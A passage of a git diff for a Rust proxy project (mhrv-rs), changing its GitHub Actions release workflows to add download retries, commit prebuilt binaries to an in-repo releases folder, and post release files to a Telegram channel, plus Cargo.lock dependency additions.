+          # (e.g. the former i686-pc-windows-msvc on 1.77.2) doesn't collide
+          # with stable-Rust caches for other targets, and a future toolchain
+          # bump invalidates only the affected slot.
+          key: ${{ matrix.target }}-${{ matrix.rust_toolchain || 'stable' }}
           cache-bin: "false"
 
       # eframe needs a few system libs on Linux for window management, keyboard,
@@ -578,10 +598,33 @@ jobs:
         with:
           fetch-depth: 0
 
-      - uses: actions/download-artifact@v4
-        with:
-          path: dist
-          merge-multiple: true
+      # `actions/download-artifact@v4` has been intermittently flaking on
+      # this workflow with "5 retries exhausted" on a single artifact (after
+      # ~10 of 13 succeed). Replace it with a manual retry loop — usually
+      # the second attempt succeeds, the third nails any laggards. We use
+      # `gh run download` against the current run so we don't depend on the
+      # release page existing yet (it doesn't until the softprops step runs).
+      - name: Download all build artifacts (with retries)
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          mkdir -p dist
+          for attempt in 1 2 3; do
+            if gh run download "${GITHUB_RUN_ID}" --dir dist --repo "${GITHUB_REPOSITORY}"; then
+              echo "downloaded all artifacts on attempt $attempt"
+              # `gh run download` puts each artifact in its own subdir;
+              # flatten so downstream steps that expect dist/<file> work
+              # the same as `merge-multiple: true` did.
+              find dist -type f -mindepth 2 -exec mv -f {} dist/ \;
+              find dist -type d -empty -delete
+              ls -la dist/
+              exit 0
+            fi
+            echo "download attempt $attempt failed; retrying in 30s..."
+            sleep 30
+          done
+          echo "::error::failed to download artifacts after 3 attempts"
+          exit 1
 
       # Compose the GitHub release body from `docs/changelog/v<ver>.md`
       # so the Releases page tells humans what actually changed —
@@ -608,8 +651,20 @@ jobs:
           fi
           {
             echo 'body<<__RELEASE_BODY_EOF__'
-            # Strip leading HTML comment that documents the file format.
-            sed -e '1{/^<!--/d;}' "$CHANGELOG"
+            # Strip leading HTML comment blocks (single-line OR multi-line)
+            # so the GitHub Release page sees only the body content, not
+            # the file-format header comment that every changelog has.
+            # Also strips any leading whitespace/blank lines that follow.
+            #
+            # Quoted heredoc (`<<'PY'`) so backticks/$ in the python
+            # snippet aren't shell-interpolated; CHANGELOG is passed in
+            # as an env var on the python invocation rather than via
+            # `$CHANGELOG` interpolation inside the heredoc.
+            CHANGELOG_PATH="$CHANGELOG" python3 - <<'PY'
+          import os, re, pathlib
+          body = pathlib.Path(os.environ["CHANGELOG_PATH"]).read_text(encoding="utf-8")
+          print(re.sub(r"^\s*(?:<!--.*?-->\s*)+", "", body, count=1, flags=re.S), end="")
+          PY
             echo
             echo '__RELEASE_BODY_EOF__'
           } >> "$GITHUB_OUTPUT"
@@ -636,84 +691,150 @@ jobs:
           append_body: true
           generate_release_notes: true
 
-  # Notify the Persian-speaking Telegram channel with the CI-built
-  # Android APK + its sha256 + the per-version changelog from
-  # `docs/changelog/v<tag>.md`.
-  #
-  # Two Telegram API calls:
-  #   1. sendDocument — APK file + a short caption (Telegram caps
-  #      captions at 1024 chars, and we have bigger changelogs than
-  #      that).
-  #   2. sendMessage — full changelog as a reply to #1, Persian
-  #      quote-block first then English, same pattern as the
-  #      previous manual post. No emojis, as the user asked.
-  #
-  # Needs two repo secrets:
-  #   TELEGRAM_BOT_TOKEN  — bot the channel admits as poster
-  #   TELEGRAM_CHAT_ID    — numeric chat id (starts with -100...)
-  # Missing either => the whole job is skipped (not failed) so a
-  # forker who hasn't set up a Telegram channel gets a clean release.
-  telegram:
-    needs: [android, release]
+  # Refresh the in-repo `releases/` folder with the latest pre-built
+  # artifacts so users behind GitHub-Releases-page filtering (the IR
+  # state network filters the dynamic /releases/ URL but not the static
+  # `Code → Download ZIP` of the source tree) can still download.
+  # Practice was started pre-v1.1.0, dropped, then resumed at user
+  # request after a Telegram-channel suggestion: "فقط داخل پوشه ریلیز
+  # پروژه اپلود بکن — مشکل دانلود حل میشه — راحت میشه از گیتهاب دانلود
+  # کرد." The folder holds ONLY the latest version (replace, not
+  # archive); each tag refresh overwrites the previous artifacts. The
+  # existing release-page workflow keeps versioned artifacts behind
+  # `https://github.com/.../releases/tag/v...` for users who can reach
+  # that URL — this in-repo folder is the fallback for users who can't.
+  commit-releases:
+    needs: [build, android, release]
     runs-on: ubuntu-latest
-    # Gated on the repo variable `TELEGRAM_NOTIFY_ENABLED`. Default is
-    # OFF — the job skips silently unless the variable is set to the
-    # literal string "true". Toggle via:
-    #
-    #     gh variable set TELEGRAM_NOTIFY_ENABLED --body true
-    #     gh variable set TELEGRAM_NOTIFY_ENABLED --body false
-    #
-    # Keeping the machinery (script + secrets) in place so flipping
-    # the switch back on is a one-liner, not a workflow edit.
-    if: ${{ vars.TELEGRAM_NOTIFY_ENABLED == 'true' && needs.android.result == 'success' }}
+    permissions:
+      contents: write
     steps:
+      # Always check out main, not the tag — we're committing back to
+      # the moving branch. fetch-depth 0 so `git push origin HEAD:main`
+      # has the lineage to fast-forward.
       - uses: actions/checkout@v4
-
-      - uses: actions/download-artifact@v4
         with:
-          name: mhrv-rs-android-universal
-          path: apk
+          ref: main
+          fetch-depth: 0
 
-      - name: Post to Telegram
+      # Pull artifacts from the GitHub Release page (which the `release`
+      # job populated a few seconds earlier) rather than the workflow
+      # artifacts API. The artifacts API path —
+      # `actions/download-artifact@v4` with `merge-multiple: true` —
+      # has been failing with "artifact download failed after 5
+      # retries" on one of the ~13 artifacts on multiple consecutive
+      # runs (v1.7.5 retrigger, v1.7.6). The 10 fast downloads that
+      # complete first all succeed; the 11th-13th hit the error.
+      # `gh release download` reads from GitHub's Release-page CDN,
+      # which is independent of the artifacts blob store and has a
+      # different retry / rate-limit profile. Same files, more
+      # reliable surface.
+      - name: Download artifacts from the GitHub Release page
         env:
-          BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}
-          CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}
-          INCLUDE_CHANGELOG: ${{ vars.TELEGRAM_INCLUDE_CHANGELOG }}
-        # Python over curl/bash so we don't have to fight curl's -F
-        # value-interpretation rules. curl treats `-F "caption=<..."`
-        # as "read the caption from file named ..." when the value
-        # starts with `<`, which matches our `<b>` HTML-bold tags and
-        # silently turns the whole job into a "file not found" exit
-        # 26. Python stdlib has no such wart.
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          VER="${{ inputs.version || github.ref_name }}"
+          # Strip leading `v` to normalize, then re-add — the Release
+          # tag is `vX.Y.Z`, but for the rest of the workflow we use
+          # bare `X.Y.Z`. Mirror the same pattern here so a downstream
+          # readme update can use the bare version.
+          VER="${VER#v}"
+          mkdir -p artifacts
+          gh release download "v${VER}" \
+            --repo "${{ github.repository }}" \
+            --dir artifacts \
+            --pattern '*.tar.gz' \
+            --pattern '*.zip' \
+            --pattern '*.apk'
+          echo "--- artifacts/ contents ---"
+          ls -la artifacts/
+
+      - name: Refresh releases/ folder
         run: |
           set -euo pipefail
           VER="${{ inputs.version || github.ref_name }}"
           VER="${VER#v}"
-          APK="apk/mhrv-rs-android-universal-v${VER}.apk"
 
-          if [ -z "${BOT_TOKEN:-}" ] || [ -z "${CHAT_ID:-}" ]; then
-            echo "::notice::TELEGRAM_BOT_TOKEN / TELEGRAM_CHAT_ID not set, skipping Telegram post"
-            exit 0
-          fi
+          mkdir -p releases
+
+          # Wipe old binary artifacts (.apk, .tar.gz, .zip) but keep
+          # README.md and .gitattributes — those are folder-level docs
+          # that stay constant across versions and shouldn't be
+          # regenerated on every release.
+          find releases -maxdepth 1 -type f \
+            \( -name '*.apk' -o -name '*.tar.gz' -o -name '*.zip' \) \
+            -delete
+
+          # Copy desktop archives. Their names already include the
+          # platform identifier (mhrv-rs-linux-amd64.tar.gz, etc.) and
+          # are version-stable — no rename needed.
+          for f in artifacts/*.tar.gz artifacts/*.zip; do
+            [ -f "$f" ] || continue
+            cp "$f" "releases/$(basename "$f")"
+          done
 
-          if [ ! -f "$APK" ]; then
-            echo "::error::expected $APK to exist; got:"
-            ls -la apk/
-            exit 1
+          # Android APKs come with the version baked into the name
+          # (mhrv-rs-android-universal-v1.7.5.apk). Copy all of them so
+          # users on slow connections can grab a per-ABI APK (~37 MB)
+          # instead of the universal (~110 MB).
+          for f in artifacts/mhrv-rs-android-*.apk; do
+            [ -f "$f" ] || continue
+            cp "$f" "releases/$(basename "$f")"
+          done
+
+          # Update the "Current version" line in releases/README.md
+          # (both English and Persian copies) and APK filename refs so
+          # the doc stays accurate. `sed -i` BSD/GNU compatibility is
+          # handled by attaching a backup suffix (`-i.bak`) and deleting
+          # the `.bak` file afterwards — the runner is Linux so bare `-i`
+          # would work, but the suffixed form also works with macOS sed.
+          if [ -f releases/README.md ]; then
+            sed -i.bak \
+              -e "s/Current version: \*\*v[0-9][0-9.]*\*\*/Current version: **v${VER}**/" \
+              -e "s/نسخهٔ فعلی: \*\*v[0-9][0-9.]*\*\*/نسخهٔ فعلی: **v${VER}**/" \
+              -e "s/mhrv-rs-android-universal-v[0-9][0-9.]*\.apk/mhrv-rs-android-universal-v${VER}.apk/g" \
+              releases/README.md
+            rm -f releases/README.md.bak
           fi
 
-          # --with-changelog is opt-in. Default post is just the APK
-          # plus a short caption with the SHA-256, repo URL, and release
-          # URL — no long body. To include the Persian/English bullets
-          # for a specific tag, set the repo variable
-          # TELEGRAM_INCLUDE_CHANGELOG=true before pushing that tag.
-          INCLUDE_CHANGELOG_FLAG=""
-          if [ "${INCLUDE_CHANGELOG:-}" = "true" ]; then
-            INCLUDE_CHANGELOG_FLAG="--with-changelog"
+          echo "--- releases/ contents after refresh ---"
+          ls -la releases/
+
+      - name: Commit + push to main
+        run: |
+          set -euo pipefail
+          VER="${{ inputs.version || github.ref_name }}"
+          VER="${VER#v}"
+
+          git config user.name "github-actions[bot]"
+          git config user.email "41898282+github-actions[bot]@users.noreply.github.com"
+
+          git add releases
+          if git diff --cached --quiet; then
+            echo "No releases/ changes to commit (artifacts identical to current HEAD?)."
+            exit 0
           fi
-          python3 .github/scripts/telegram_release_notify.py \
-            --apk "$APK" \
-            --version "$VER" \
-            --repo "$GITHUB_REPOSITORY" \
-            --changelog "docs/changelog/v${VER}.md" \
-            $INCLUDE_CHANGELOG_FLAG
+
+          git commit -m "chore(releases): refresh prebuilt binaries for v${VER}" \
+                     -m "Auto-committed by release workflow so users behind GitHub-Releases-page filtering can download via the in-repo releases/ folder. The GitHub Release page itself still has the canonical versioned artifacts; this folder is the fallback path for users who can only reach the static source tree (Code → Download ZIP)."
+
+          # Push to main. This job checked out `main` (not the tag), so
+          # the new commit sits directly on top of the branch tip and the
+          # push is a plain fast-forward — no force needed (it is rejected
+          # only if main moved after checkout). Tag protection rules apply
+          # to refs/tags/*, not refs/heads/main, so they don't gate this.
+          git push origin HEAD:main
+
+  # The legacy `telegram` job that posted a universal APK + changelog
+  # bundle to the main Telegram channel was removed in v1.9.4. It was
+  # superseded by `.github/workflows/telegram-publish-files.yml` (per-
+  # platform per-file posts to the files channel + a single cross-link
+  # to the main channel). With both running together, every release
+  # produced a duplicate APK post on the main channel — the legacy
+  # bundled post AND the new cross-link.
+  #
+  # If you ever need to bring back the bundled-APK-on-main pattern, the
+  # commit history before v1.9.4 has the full job — `git log -- .github/workflows/release.yml`.
+  # The `TELEGRAM_NOTIFY_ENABLED` repo variable + `telegram_release_notify.py`
+  # script that the legacy job called are no longer referenced.
diff --git a/.github/workflows/telegram-publish-files.yml b/.github/workflows/telegram-publish-files.yml
new file mode 100644
index 00000000..f78b548e
--- /dev/null
+++ b/.github/workflows/telegram-publish-files.yml
@@ -0,0 +1,145 @@
+name: Telegram publish release files
+
+# Posts every release artifact (Android APKs, Windows ZIP, macOS, Linux,
+# OpenWRT, Raspbian) to the Telegram channel as individual messages with
+# Persian captions and a #v<MAJOR><MINOR><PATCH> hashtag. Files larger
+# than the bot API's 50 MB ceiling are split into ~45 MB byte chunks
+# server-side and posted as `<name>.part_aa`, `.part_ab`, ... — recipients
+# reassemble with `cat <name>.part_* > <name>`.
+#
+# This workflow is decoupled from `release.yml` so it can be re-triggered
+# for any historical tag (e.g. to re-post v1.8.0 after a Telegram channel
+# wipe) without rebuilding artifacts. It downloads from the GitHub Release
+# page directly via `gh release download`, so the assets must already
+# exist there.
+
+on:
+  workflow_dispatch:
+    inputs:
+      version:
+        description: 'Release tag to publish (with or without the v prefix, e.g. 1.8.0 or v1.8.0)'
+        required: true
+        type: string
+  # Auto-trigger whenever a `release` workflow run completes; the job-level
+  # `if` below skips runs that did not succeed. The `head_branch` of the
+  # triggering run is the tag name (e.g. `v1.8.0`) on tag-pushed releases,
+  # which is what we feed `gh release download`.
+  workflow_run:
+    workflows: [release]
+    types: [completed]
+
+permissions:
+  contents: read
+
+jobs:
+  publish:
+    # Skip when triggered by a `release` run that didn't succeed — no
+    # point posting half a release. Manual `workflow_dispatch` always
+    # runs (the user explicitly asked for it).
+    if: |
+      github.event_name == 'workflow_dispatch'
+      || github.event.workflow_run.conclusion == 'success'
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          # Sparse checkout would be nicer but stock checkout is fast
+          # enough for a 5 MB workflow file + ~200 KB script.
+          fetch-depth: 1
+
+      - name: Resolve version + hashtag
+        id: ver
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          if [ -n "${{ inputs.version || '' }}" ]; then
+            VER="${{ inputs.version }}"
+          else
+            # workflow_run path. `head_branch` for a tag-pushed release
+            # workflow is the tag name (e.g. `v1.8.0`).
+            VER="${{ github.event.workflow_run.head_branch || '' }}"
+          fi
+          if [ -z "$VER" ]; then
+            echo "::error::could not determine version from inputs or workflow_run trigger"
+            exit 1
+          fi
+          # Strip the leading `v` if present.
+          VER="${VER#v}"
+          # Hashtag: `#v` + version with dots removed. So 1.8.0 → #v180,
+          # 1.8.10 → #v1810, 2.0.0 → #v200. Predictable across releases.
+          HASHTAG="#v$(echo "$VER" | tr -d '.')"
+          echo "version=$VER" >> "$GITHUB_OUTPUT"
+          echo "hashtag=$HASHTAG" >> "$GITHUB_OUTPUT"
+          echo "Resolved: version=$VER  hashtag=$HASHTAG"
+
+      - name: Download release assets
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          mkdir -p assets
+          # Mirror the retry pattern from `release.yml`'s download step —
+          # GitHub's release-asset CDN occasionally times out on cold
+          # tags. Three attempts with 30 s backoff covers most flakes.
+          #
+          # `--clobber` overwrites any partial files left behind by a
+          # previous failed attempt — without it, attempt 2/3 would error
+          # with "already exists" the moment any single asset finished
+          # downloading on attempt 1 before the CDN timed out (the v1.9.2
+          # publish hit exactly this — HTTP 500 mid-download, then attempts
+          # 2/3 failed on "already exists" for the assets that did finish).
+          for attempt in 1 2 3; do
+            if gh release download "v${{ steps.ver.outputs.version }}" \
+                 --dir assets \
+                 --clobber \
+                 --repo "${GITHUB_REPOSITORY}"; then
+              echo "downloaded release assets on attempt $attempt"
+              ls -la assets/
+              exit 0
+            fi
+            echo "attempt $attempt failed; retrying in 30s..."
+            sleep 30
+          done
+          echo "::error::failed to download release assets after 3 attempts"
+          exit 1
+
+      - name: Publish files to Telegram channel
+        env:
+          BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}
+          # The files channel — supergroup-style negative ID, hard-coded
+          # rather than templated as a repo variable because there's only
+          # ever one of these and putting it in source makes the workflow
+          # auditable. The bot token already has post permissions there.
+          CHAT_ID: '-1003966234444'
+          # The main announcement channel. Receives a single cross-link
+          # message per release pointing at the file-channel anchor post,
+          # instead of the previous behaviour of attaching the universal
+          # APK + full changelog. Sourced from the same secret the
+          # legacy `telegram` job in release.yml used.
+          MAIN_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}
+          # Public-username form of the files channel link. Used for
+          # both (a) the post-link in the main-channel cross-post — so
+          # `t.me/<name>/<msg>` works for everyone, not just members
+          # via `t.me/c/<id>/<msg>` — and (b) one of the two
+          # channel-join links rendered at the bottom of the cross-post.
+          # Defaults to `mhrv_rs` (current public username); override via
+          # repo variable if the channel is renamed.
+          FILES_CHANNEL_USERNAME: ${{ vars.FILES_CHANNEL_USERNAME || 'mhrv_rs' }}
+          # `t.me/+<hash>` invite link for the files channel. Rendered
+          # as the second channel-join option in the main-channel
+          # cross-post — the only join path that works for users coming
+          # from outside Telegram search (private/restricted channels)
+          # or whose Telegram client doesn't resolve usernames cleanly.
+          # Override via repo variable if the channel's invite hash is
+          # rotated.
+          FILES_CHANNEL_INVITE: ${{ vars.FILES_CHANNEL_INVITE || 'https://t.me/+R1OyoHX2boA1ZDgx' }}
+        run: |
+          if [ -z "${BOT_TOKEN:-}" ]; then
+            echo "::error::TELEGRAM_BOT_TOKEN not set; can't publish"
+            exit 1
+          fi
+          python3 .github/scripts/telegram_publish_files.py \
+            --assets-dir assets \
+            --version "${{ steps.ver.outputs.version }}" \
+            --hashtag "${{ steps.ver.outputs.hashtag }}"
diff --git a/Cargo.lock b/Cargo.lock
index 66a711c2..74a16ffb 100644
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -28,6 +28,71 @@ dependencies = [
  "serde",
 ]
 
+[[package]]
+name = "accesskit_consumer"
+version = "0.16.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8c17cca53c09fbd7288667b22a201274b9becaa27f0b91bf52a526db95de45e6"
+dependencies = [
+ "accesskit",
+]
+
+[[package]]
+name = "accesskit_macos"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cd3b6ae1eabbfbced10e840fd3fce8a93ae84f174b3e4ba892ab7bcb42e477a7"
+dependencies = [
+ "accesskit",
+ "accesskit_consumer",
+ "objc2 0.3.0-beta.3.patch-leaks.3",
+ "once_cell",
+]
+
+[[package]]
+name = "accesskit_unix"
+version = "0.6.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "09f46c18d99ba61ad7123dd13eeb0c104436ab6af1df6a1cd8c11054ed394a08"
+dependencies = [
+ "accesskit",
+ "accesskit_consumer",
+ "async-channel",
+ "async-once-cell",
+ "atspi",
+ "futures-lite 1.13.0",
+ "once_cell",
+ "serde",
+ "zbus",
+]
+
+[[package]]
+name = "accesskit_windows"
+version = "0.15.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "afcae27ec0974fc7c3b0b318783be89fd1b2e66dd702179fe600166a38ff4a0b"
+dependencies = [
+ "accesskit",
+ "accesskit_consumer",
+ "once_cell",
+ "paste",
+ "static_assertions",
+ "windows 0.48.0",
+]
+
+[[package]]
+name = "accesskit_winit"
+version = "0.16.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5284218aca17d9e150164428a0ebc7b955f70e3a9a78b4c20894513aabf98a67"
+dependencies = [
+ "accesskit",
+ "accesskit_macos",
+ "accesskit_unix",
+ "accesskit_windows",
+ "winit",
+]
+
 [[package]]
 name = "adler2"
 version = "2.0.1"
@@ -160,6 +225,12 @@ dependencies = [
  "windows-sys 0.61.2",
 ]
 
+[[package]]
+name = "anyhow"
+version = "1.0.102"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c"
+
 [[package]]
 name = "arboard"
 version = "3.6.1"
@@ -173,7 +244,7 @@ dependencies = [
  "objc2-foundation 0.3.2",
  "parking_lot",
  "percent-encoding",
- "windows-sys 0.52.0",
+ "windows-sys 0.60.2",
  "x11rb",
 ]
 
@@ -237,6 +308,16 @@ dependencies = [
  "syn 2.0.117",
 ]
 
+[[package]]
+name = "async-broadcast"
+version = "0.5.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7c48ccdbf6ca6b121e0f586cbc0e73ae440e56c67c30fa0873b4e110d9c26d2b"
+dependencies = [
+ "event-listener 2.5.3",
+ "futures-core",
+]
+
 [[package]]
 name = "async-channel"
 version = "2.5.0"
@@ -249,6 +330,142 @@ dependencies = [
  "pin-project-lite",
 ]
 
+[[package]]
+name = "async-executor"
+version = "1.14.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c96bf972d85afc50bf5ab8fe2d54d1586b4e0b46c97c50a0c9e71e2f7bcd812a"
+dependencies = [
+ "async-task",
+ "concurrent-queue",
+ "fastrand 2.4.1",
+ "futures-lite 2.6.1",
+ "pin-project-lite",
+ "slab",
+]
+
+[[package]]
+name = "async-fs"
+version = "1.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "279cf904654eeebfa37ac9bb1598880884924aab82e290aa65c9e77a0e142e06"
+dependencies = [
+ "async-lock 2.8.0",
+ "autocfg",
+ "blocking",
+ "futures-lite 1.13.0",
+]
+
+[[package]]
+name = "async-io"
+version = "1.13.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0fc5b45d93ef0529756f812ca52e44c221b35341892d3dcc34132ac02f3dd2af"
+dependencies = [
+ "async-lock 2.8.0",
+ "autocfg",
+ "cfg-if",
+ "concurrent-queue",
+ "futures-lite 1.13.0",
+ "log",
+ "parking",
+ "polling 2.8.0",
+ "rustix 0.37.28",
+ "slab",
+ "socket2 0.4.10",
+ "waker-fn",
+]
+
+[[package]]
+name = "async-io"
+version = "2.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "456b8a8feb6f42d237746d4b3e9a178494627745c3c56c6ea55d92ba50d026fc"
+dependencies = [
+ "autocfg",
+ "cfg-if",
+ "concurrent-queue",
+ "futures-io",
+ "futures-lite 2.6.1",
+ "parking",
+ "polling 3.11.0",
+ "rustix 1.1.4",
+ "slab",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "async-lock"
+version = "2.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "287272293e9d8c41773cec55e365490fe034813a2f172f502d6ddcf75b2f582b"
+dependencies = [
+ "event-listener 2.5.3",
+]
+
+[[package]]
+name = "async-lock"
+version = "3.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "290f7f2596bd5b78a9fec8088ccd89180d7f9f55b94b0576823bbbdc72ee8311"
+dependencies = [
+ "event-listener 5.4.1",
+ "event-listener-strategy",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "async-once-cell"
+version = "0.5.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4288f83726785267c6f2ef073a3d83dc3f9b81464e9f99898240cced85fce35a"
+
+[[package]]
+name = "async-process"
+version = "1.8.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ea6438ba0a08d81529c69b36700fa2f95837bfe3e776ab39cde9c14d9149da88"
+dependencies = [
+ "async-io 1.13.0",
+ "async-lock 2.8.0",
+ "async-signal",
+ "blocking",
+ "cfg-if",
+ "event-listener 3.1.0",
+ "futures-lite 1.13.0",
+ "rustix 0.38.44",
+ "windows-sys 0.48.0",
+]
+
+[[package]]
+name = "async-recursion"
+version = "1.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3b43422f69d8ff38f95f1b2bb76517c91589a924d1559a0e935d7c8ce0274c11"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "async-signal"
+version = "0.2.13"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "43c070bbf59cd3570b6b2dd54cd772527c7c3620fce8be898406dd3ed6adc64c"
+dependencies = [
+ "async-io 2.6.0",
+ "async-lock 3.4.2",
+ "atomic-waker",
+ "cfg-if",
+ "futures-core",
+ "futures-io",
+ "rustix 1.1.4",
+ "signal-hook-registry",
+ "slab",
+ "windows-sys 0.61.2",
+]
+
 [[package]]
 name = "async-task"
 version = "4.7.1"
@@ -272,6 +489,54 @@ version = "1.1.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1505bd5d3d116872e7271a6d4e16d81d0c8570876c8de68093a09ac269d8aac0"
 
+[[package]]
+name = "atspi"
+version = "0.19.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6059f350ab6f593ea00727b334265c4dfc7fd442ee32d264794bd9bdc68e87ca"
+dependencies = [
+ "atspi-common",
+ "atspi-connection",
+ "atspi-proxies",
+]
+
+[[package]]
+name = "atspi-common"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "92af95f966d2431f962bc632c2e68eda7777330158bf640c4af4249349b2cdf5"
+dependencies = [
+ "enumflags2",
+ "serde",
+ "static_assertions",
+ "zbus",
+ "zbus_names",
+ "zvariant",
+]
+
+[[package]]
+name = "atspi-connection"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a0c65e7d70f86d4c0e3b2d585d9bf3f979f0b19d635a336725a88d279f76b939"
+dependencies = [
+ "atspi-common",
+ "atspi-proxies",
+ "futures-lite 1.13.0",
+ "zbus",
+]
+
+[[package]]
+name = "atspi-proxies"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6495661273703e7a229356dcbe8c8f38223d697aacfaf0e13590a9ac9977bb52"
+dependencies = [
+ "atspi-common",
+ "serde",
+ "zbus",
+]
+
 [[package]]
 name = "autocfg"
 version = "1.5.0"
@@ -361,13 +626,32 @@ dependencies = [
  "generic-array",
 ]
 
+[[package]]
+name = "block-sys"
+version = "0.1.0-beta.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0fa55741ee90902547802152aaf3f8e5248aab7e21468089560d4c8840561146"
+dependencies = [
+ "objc-sys 0.2.0-beta.2",
+]
+
 [[package]]
 name = "block-sys"
 version = "0.2.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "ae85a0696e7ea3b835a453750bf002770776609115e6d25c6d2ff28a8200f7e7"
 dependencies = [
- "objc-sys",
+ "objc-sys 0.3.5",
+]
+
+[[package]]
+name = "block2"
+version = "0.2.0-alpha.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8dd9e63c1744f755c2f60332b88de39d341e5e86239014ad839bd71c106dec42"
+dependencies = [
+ "block-sys 0.1.0-beta.1",
+ "objc2-encode 2.0.0-pre.2",
 ]
 
 [[package]]
@@ -376,7 +660,7 @@ version = "0.3.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "15b55663a85f33501257357e6421bb33e769d5c9ffb5ba0921c975a123e35e68"
 dependencies = [
- "block-sys",
+ "block-sys 0.2.1",
  "objc2 0.4.1",
 ]
 
@@ -398,7 +682,7 @@ dependencies = [
  "async-channel",
  "async-task",
  "futures-io",
- "futures-lite",
+ "futures-lite 2.6.1",
  "piper",
 ]
 
@@ -428,6 +712,12 @@ dependencies = [
  "syn 2.0.117",
 ]
 
+[[package]]
+name = "byteorder"
+version = "1.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
+
 [[package]]
 name = "byteorder-lite"
 version = "0.1.0"
@@ -468,7 +758,7 @@ checksum = "fba7adb4dd5aa98e5553510223000e7148f621165ec5f9acd7113f6ca4995298"
 dependencies = [
  "bitflags 2.11.1",
  "log",
- "polling",
+ "polling 3.11.0",
  "rustix 0.38.44",
  "slab",
  "thiserror 1.0.69",
@@ -481,7 +771,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "4dbf9978365bac10f54d1d4b04f7ce4427e51f71d61f2fe15e3fed5166474df7"
 dependencies = [
  "bitflags 2.11.1",
- "polling",
+ "polling 3.11.0",
  "rustix 1.1.4",
  "slab",
  "tracing",
@@ -556,6 +846,17 @@ dependencies = [
  "libc",
 ]
 
+[[package]]
+name = "chacha20"
+version = "0.10.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6f8d983286843e49675a4b7a2d174efe136dc93a18d69130dd18198a6c167601"
+dependencies = [
+ "cfg-if",
+ "cpufeatures 0.3.0",
+ "rand_core 0.10.1",
+]
+
 [[package]]
 name = "chrono"
 version = "0.4.44"
@@ -753,6 +1054,15 @@ dependencies = [
  "libc",
 ]
 
+[[package]]
+name = "cpufeatures"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8b2a41393f66f16b0823bb79094d54ac5fbd34ab292ddafb9a0456ac9f87d201"
+dependencies = [
+ "libc",
+]
+
 [[package]]
 name = "crc32fast"
 version = "1.5.0"
@@ -839,6 +1149,17 @@ dependencies = [
  "powerfmt",
 ]
 
+[[package]]
+name = "derivative"
+version = "2.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fcc3dd5e9e9c0b295d6e1e4d811fb6f157d5ffd784b8d202fc62eac8035a770b"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+]
+
 [[package]]
 name = "digest"
 version = "0.10.7"
@@ -1032,6 +1353,7 @@ version = "0.28.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "fac4e066af341bf92559f60dbdf2020b2a03c963415349af5f3f8d79ff7a4926"
 dependencies = [
+ "accesskit_winit",
  "ahash",
  "arboard",
  "egui",
@@ -1055,7 +1377,7 @@ dependencies = [
  "egui",
  "glow",
  "log",
- "memoffset",
+ "memoffset 0.9.1",
  "wasm-bindgen",
  "web-sys",
 ]
@@ -1071,12 +1393,21 @@ dependencies = [
 ]
 
 [[package]]
-name = "enum-as-inner"
-version = "0.6.1"
+name = "enumflags2"
+version = "0.7.12"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "a1e6a265c649f3f5979b601d26f1d05ada116434c87741c9493cb56218f76cbc"
